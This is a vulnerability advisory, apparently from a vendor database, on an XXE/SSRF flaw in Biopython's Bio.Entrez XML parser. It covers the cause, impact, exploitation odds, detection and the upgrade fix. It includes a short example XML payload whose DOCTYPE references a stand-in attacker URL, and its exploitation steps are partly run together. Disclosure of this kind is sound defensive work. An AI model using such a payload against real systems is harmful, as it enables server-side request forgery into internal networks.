
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-68463 is an XML External Entity (XXE) injection vulnerability in the Bio.Entrez module of Biopython, affecting all versions through 1.86. The flaw allows a network-adjacent attacker with low privileges to trigger unauthorized HTTP requests via crafted XML input, enabling Server-Side Request Forgery (SSRF) and limited information disclosure. It was reported on November 25, 2025, by researcher Sebastian Pipping, publicly disclosed on December 18, 2025, and fixed in Biopython 1.87 (released March 30, 2026). The CVSS v3.1 base score is 4.9 (Medium), assigned by MITRE (Github Advisory, Red Hat Advisory).
The root cause is CWE-611 (Improper Restriction of XML External Entity Reference). The Bio.Entrez.DataHandler class — which powers Bio.Entrez.read and Bio.Entrez.parse — processes XML responses from NCBI's Entrez API and resolves DTD and XSD URLs via Python's urllib.request.urlopen when the referenced file is not found in the local filesystem cache. An attacker who can supply malicious XML (e.g., via a man-in-the-middle position or by controlling XML input to the parser) can embed a crafted DOCTYPE declaration referencing an arbitrary URL, causing the server running Biopython to issue an outbound HTTP GET request to an attacker-controlled or internal endpoint. The vulnerability is also susceptible to MITM-based cache poisoning due to the absence of TLS enforcement on fetched DTD/XSD resources. A detailed report with proof-of-concept code was published in the GitHub issue tracker (Biopython Issue #5109, oss-security).
Successful exploitation can result in limited confidentiality loss (e.g., disclosure of internal network topology or responses from internal services via SSRF) and limited availability impact (e.g., resource exhaustion from repeated outbound requests). Integrity is not directly affected. The scope change in the CVSS score reflects that the impact extends beyond the Biopython process itself to internal network resources that may be reachable from the host running the vulnerable code, making this particularly relevant in cloud or containerized bioinformatics environments (Github Advisory, Biopython Issue #5109).
No public proof-of-concept exploit code has been released beyond the demonstration script referenced in the original GitHub issue report. There is no evidence of in-the-wild exploitation, no known threat actor attribution, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.015% (3rd percentile), indicating a low near-term exploitation probability (Github Advisory, Feedly).
Bio.Entrez.read() or Bio.Entrez.parse() on XML data that can be influenced by an attacker (e.g., via MITM on an unencrypted HTTP connection to NCBI Entrez, or by supplying crafted XML directly).DOCTYPE declaration that references an attacker-controlled or internal URL, for example:<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://attacker.internal/malicious.dtd">
<root/>Bio.Entrez.DataHandler. This may require a MITM position on the HTTP connection between the Biopython application and NCBI, or control over an upstream data source.Bio.Entrez.read() or Bio.Entrez.parse() processes the malicious XML, the parser checks its local DTD cache; on a cache miss, it calls urllib.request.urlopen(url) with the attacker-supplied URL, issuing an outbound HTTP GET request.*.dtd, *.xsd).urllib or http.client activity fetching DTD/XSD resources from unexpected external or internal hosts.Upgrade Biopython to version 1.87 or later, which was released on March 30, 2026, and addresses this vulnerability via two pull requests (#5114 and #5148) that restrict external entity resolution in the XML parser (oss-security, Github Advisory). As a short-term workaround where upgrading is not immediately possible, disable or restrict outbound HTTP access from the host running Biopython to limit SSRF impact, and avoid passing untrusted XML data to Bio.Entrez.read() or Bio.Entrez.parse(). Additionally, consider using XML parsers with external entity processing explicitly disabled as a defense-in-depth measure.
The vulnerability was reported by Sebastian Pipping, who also posted a notification to the oss-security mailing list upon the release of Biopython 1.87, noting the fix for both the XXE and SSRF aspects of the issue (oss-security). Red Hat tracked the issue via Bugzilla and assigned it medium severity for their products (Red Hat Bugzilla). Fedora issued package updates for python-biopython across multiple releases. Community interest has been modest, consistent with the medium CVSS score and lack of active exploitation.
Fix availability across major Linux distributions and their releases.
bookworm
python-biopython
sid
python-biopython: 1.87+dfsg-1
trixie
python-biopython
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."